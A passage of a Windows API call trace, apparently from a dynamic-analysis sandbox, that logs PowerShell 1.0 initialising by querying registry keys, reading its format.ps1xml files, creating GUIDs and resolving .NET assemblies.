	[0537.776] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1cd5cc, lpData=0x0, lpcbData=0x1cd5c8*=0x0 | out: lpType=0x1cd5cc*=0x1, lpData=0x0, lpcbData=0x1cd5c8*=0x74) returned 0x0
	[0537.776] CoTaskMemAlloc (cb=0x78) returned 0x3823a0
	[0537.776] RegQueryValueExW (in: hKey=0x324, lpValueName="path", lpReserved=0x0, lpType=0x1cd59c, lpData=0x3823a0, lpcbData=0x1cd598*=0x74 | out: lpType=0x1cd59c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x1cd598*=0x74) returned 0x0
	[0537.776] CoTaskMemFree (pv=0x3823a0) 
	[0537.776] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x1cd310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0537.777] SetErrorMode (uMode=0x1) returned 0x1
	[0537.777] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x1cd520 | out: lpFileInformation=0x1cd520*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0537.777] SetErrorMode (uMode=0x1) returned 0x1
	[0537.778] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0537.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.778] CoTaskMemFree (pv=0x3e2f10) 
	[0537.781] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0537.781] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0537.781] CoTaskMemFree (pv=0x3e2f10) 
	[0538.780] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0538.780] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0538.781] CoTaskMemFree (pv=0x3e2f10) 
	[0538.781] CoTaskMemAlloc (cb=0x104) returned 0x3e2f10
	[0538.781] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3e2f10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0538.781] CoTaskMemFree (pv=0x3e2f10) 
	[0538.782] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0538.782] GetFileType (hFile=0x2f8) returned 0x1
	[0538.782] SetErrorMode (uMode=0x1) returned 0x1
	[0538.782] GetFileType (hFile=0x2f8) returned 0x1
	[0538.782] ReadFile (in: hFile=0x2f8, lpBuffer=0x321a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x321a118*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.783] ReadFile (in: hFile=0x2f8, lpBuffer=0x321a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x321a118*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.784] ReadFile (in: hFile=0x2f8, lpBuffer=0x321a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x321a118*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.784] ReadFile (in: hFile=0x2f8, lpBuffer=0x321a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x321a118*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.784] ReadFile (in: hFile=0x2f8, lpBuffer=0x321a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x321a118*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.785] ReadFile (in: hFile=0x2f8, lpBuffer=0x321a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x321a118*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.785] ReadFile (in: hFile=0x2f8, lpBuffer=0x321a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x321a118*, lpNumberOfBytesRead=0x1cd1b8*=0x9e2, lpOverlapped=0x0) returned 1
	[0538.785] ReadFile (in: hFile=0x2f8, lpBuffer=0x3219662, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3219662*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0538.785] ReadFile (in: hFile=0x2f8, lpBuffer=0x321a118, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x321a118*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0538.785] CloseHandle (hObject=0x2f8) returned 1
	[0538.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0538.785] SetErrorMode (uMode=0x1) returned 0x1
	[0538.786] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1
	[0538.786] SetErrorMode (uMode=0x1) returned 0x1
	[0538.786] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0538.786] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd248 | out: phkResult=0x1cd248*=0x2f8) returned 0x0
	[0538.786] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1cc, lpData=0x0, lpcbData=0x1cd1c8*=0x0 | out: lpType=0x1cd1cc*=0x1, lpData=0x0, lpcbData=0x1cd1c8*=0x56) returned 0x0
	[0538.786] CoTaskMemAlloc (cb=0x5a) returned 0x1b7b7420
	[0538.786] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd19c, lpData=0x1b7b7420, lpcbData=0x1cd198*=0x56 | out: lpType=0x1cd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd198*=0x56) returned 0x0
	[0538.786] CoTaskMemFree (pv=0x1b7b7420) 
	[0538.787] RegCloseKey (hKey=0x2f8) returned 0x0
	[0538.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0538.787] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44
	[0538.796] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x8ed2ee67, Data2=0xea4d, Data3=0x430f, Data4=([0]=0xbe, [1]=0xa4, [2]=0x78, [3]=0xa1, [4]=0x3, [5]=0x5e, [6]=0x4d, [7]=0xff))) returned 0x0
	[0538.810] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x31b5eda6, Data2=0x8af1, Data3=0x4682, Data4=([0]=0x83, [1]=0xfc, [2]=0x8c, [3]=0xc8, [4]=0x27, [5]=0x2, [6]=0x99, [7]=0x51))) returned 0x0
	[0538.812] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0538.812] GetFileType (hFile=0x2f8) returned 0x1
	[0538.812] SetErrorMode (uMode=0x1) returned 0x1
	[0538.812] GetFileType (hFile=0x2f8) returned 0x1
	[0538.812] ReadFile (in: hFile=0x2f8, lpBuffer=0x3244c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3244c80*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.814] ReadFile (in: hFile=0x2f8, lpBuffer=0x3244c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3244c80*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.814] ReadFile (in: hFile=0x2f8, lpBuffer=0x3244c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3244c80*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.815] ReadFile (in: hFile=0x2f8, lpBuffer=0x3244c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3244c80*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.815] ReadFile (in: hFile=0x2f8, lpBuffer=0x3244c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3244c80*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.816] ReadFile (in: hFile=0x2f8, lpBuffer=0x3244c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3244c80*, lpNumberOfBytesRead=0x1cd1b8*=0xfb2, lpOverlapped=0x0) returned 1
	[0538.817] ReadFile (in: hFile=0x2f8, lpBuffer=0x324439a, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x324439a*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0538.817] ReadFile (in: hFile=0x2f8, lpBuffer=0x3244c80, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3244c80*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0538.817] CloseHandle (hObject=0x2f8) returned 1
	[0538.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0538.817] SetErrorMode (uMode=0x1) returned 0x1
	[0538.817] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0538.817] SetErrorMode (uMode=0x1) returned 0x1
	[0538.817] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0538.818] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd248 | out: phkResult=0x1cd248*=0x2f8) returned 0x0
	[0538.818] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1cc, lpData=0x0, lpcbData=0x1cd1c8*=0x0 | out: lpType=0x1cd1cc*=0x1, lpData=0x0, lpcbData=0x1cd1c8*=0x56) returned 0x0
	[0538.818] CoTaskMemAlloc (cb=0x5a) returned 0x1b7b7420
	[0538.818] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd19c, lpData=0x1b7b7420, lpcbData=0x1cd198*=0x56 | out: lpType=0x1cd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd198*=0x56) returned 0x0
	[0538.818] CoTaskMemFree (pv=0x1b7b7420) 
	[0538.818] RegCloseKey (hKey=0x2f8) returned 0x0
	[0538.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0538.818] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0538.821] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xab9e5c84, Data2=0x30d2, Data3=0x4bf5, Data4=([0]=0x8a, [1]=0xeb, [2]=0x1a, [3]=0xd3, [4]=0xc, [5]=0x67, [6]=0x44, [7]=0x36))) returned 0x0
	[0538.823] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x718b46e5, Data2=0x20ce, Data3=0x4967, Data4=([0]=0x92, [1]=0xc6, [2]=0x9a, [3]=0xee, [4]=0x5d, [5]=0x3a, [6]=0x5d, [7]=0xd7))) returned 0x0
	[0538.823] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x441a2523, Data2=0x889f, Data3=0x46be, Data4=([0]=0x9a, [1]=0x4e, [2]=0xec, [3]=0x6b, [4]=0x11, [5]=0xa2, [6]=0x34, [7]=0xd2))) returned 0x0
	[0538.824] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x23f2b29b, Data2=0x54f1, Data3=0x4454, Data4=([0]=0xb8, [1]=0x66, [2]=0x47, [3]=0x1, [4]=0x59, [5]=0x10, [6]=0xfb, [7]=0x8f))) returned 0x0
	[0538.824] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0x7982cb5c, Data2=0x3535, Data3=0x43ea, Data4=([0]=0x93, [1]=0xf4, [2]=0x8, [3]=0xff, [4]=0x23, [5]=0x20, [6]=0x92, [7]=0x34))) returned 0x0
	[0538.824] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xfcb13e39, Data2=0xcffb, Data3=0x45ef, Data4=([0]=0x91, [1]=0x60, [2]=0x21, [3]=0xad, [4]=0xa2, [5]=0x7a, [6]=0xae, [7]=0xc3))) returned 0x0
	[0538.824] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0538.825] GetFileType (hFile=0x2f8) returned 0x1
	[0538.825] SetErrorMode (uMode=0x1) returned 0x1
	[0538.825] GetFileType (hFile=0x2f8) returned 0x1
	[0538.825] ReadFile (in: hFile=0x2f8, lpBuffer=0x32909e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x32909e0*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0538.826] ReadFile (in: hFile=0x2f8, lpBuffer=0x32909e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x32909e0*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0539.842] ReadFile (in: hFile=0x2f8, lpBuffer=0x32909e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x32909e0*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0539.842] ReadFile (in: hFile=0x2f8, lpBuffer=0x32909e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x32909e0*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0539.844] ReadFile (in: hFile=0x2f8, lpBuffer=0x32909e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x32909e0*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0539.844] ReadFile (in: hFile=0x2f8, lpBuffer=0x32909e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x32909e0*, lpNumberOfBytesRead=0x1cd1b8*=0x1000, lpOverlapped=0x0) returned 1
	[0539.844] ReadFile (in: hFile=0x2f8, lpBuffer=0x32909e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x32909e0*, lpNumberOfBytesRead=0x1cd1b8*=0xaca, lpOverlapped=0x0) returned 1
	[0539.844] ReadFile (in: hFile=0x2f8, lpBuffer=0x3290012, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x3290012*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0539.844] ReadFile (in: hFile=0x2f8, lpBuffer=0x32909e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd1b8, lpOverlapped=0x0 | out: lpBuffer=0x32909e0*, lpNumberOfBytesRead=0x1cd1b8*=0x0, lpOverlapped=0x0) returned 1
	[0539.844] CloseHandle (hObject=0x2f8) returned 1
	[0539.844] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0539.845] SetErrorMode (uMode=0x1) returned 0x1
	[0539.845] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd160 | out: lpFileInformation=0x1cd160*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0539.845] SetErrorMode (uMode=0x1) returned 0x1
	[0539.845] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0539.845] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd248 | out: phkResult=0x1cd248*=0x2f8) returned 0x0
	[0539.846] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd1cc, lpData=0x0, lpcbData=0x1cd1c8*=0x0 | out: lpType=0x1cd1cc*=0x1, lpData=0x0, lpcbData=0x1cd1c8*=0x56) returned 0x0
	[0539.846] CoTaskMemAlloc (cb=0x5a) returned 0x1b7b7420
	[0539.846] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd19c, lpData=0x1b7b7420, lpcbData=0x1cd198*=0x56 | out: lpType=0x1cd19c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd198*=0x56) returned 0x0
	[0539.846] CoTaskMemFree (pv=0x1b7b7420) 
	[0539.846] RegCloseKey (hKey=0x2f8) returned 0x0
	[0539.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cce90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0539.846] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0539.959] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x1cc6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0539.961] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cc6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0539.971] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x1cc6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0539.980] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc6d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0542.032] VirtualQuery (in: lpAddress=0x1cbce0, lpBuffer=0x1ccba0, dwLength=0x30 | out: lpBuffer=0x1ccba0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0542.033] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xf89b8d37, Data2=0xea3f, Data3=0x4604, Data4=([0]=0x8b, [1]=0x38, [2]=0xae, [3]=0x8f, [4]=0x3d, [5]=0x5, [6]=0x51, [7]=0xf3))) returned 0x0
	[0542.034] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xb69e9f9f, Data2=0x3a58, Data3=0x46cf, Data4=([0]=0xa3, [1]=0xe, [2]=0xba, [3]=0x32, [4]=0x1f, [5]=0xd5, [6]=0x7e, [7]=0xec))) returned 0x0
	[0542.035] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0542.036] VirtualQuery (in: lpAddress=0x1cbe90, lpBuffer=0x1ccd50, dwLength=0x30 | out: lpBuffer=0x1ccd50*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0542.037] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xef4b4c6b, Data2=0x43f2, Data3=0x47fb, Data4=([0]=0x83, [1]=0x89, [2]=0x51, [3]=0x30, [4]=0xf0, [5]=0x53, [6]=0x38, [7]=0xf4))) returned 0x0
	[0542.040] CoCreateGuid (in: pguid=0x1cd470 | out: pguid=0x1cd470*(Data1=0xde4f4717, Data2=0x550a, Data3=0x46db, Data4=([0]=0x93, [1]=0x4a, [2]=0x3, [3]=0x86, [4]=0xfe, [5]=0xa6, [6]=0xed, [7]=0x33))) returned 0x0
	[0542.041] VirtualQuery (in: lpAddress=0x1cc0e0, lpBuffer=0x1ccfa0, dwLength=0x30 | out: lpBuffer=0x1ccfa0*(BaseAddress=0x1cc000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
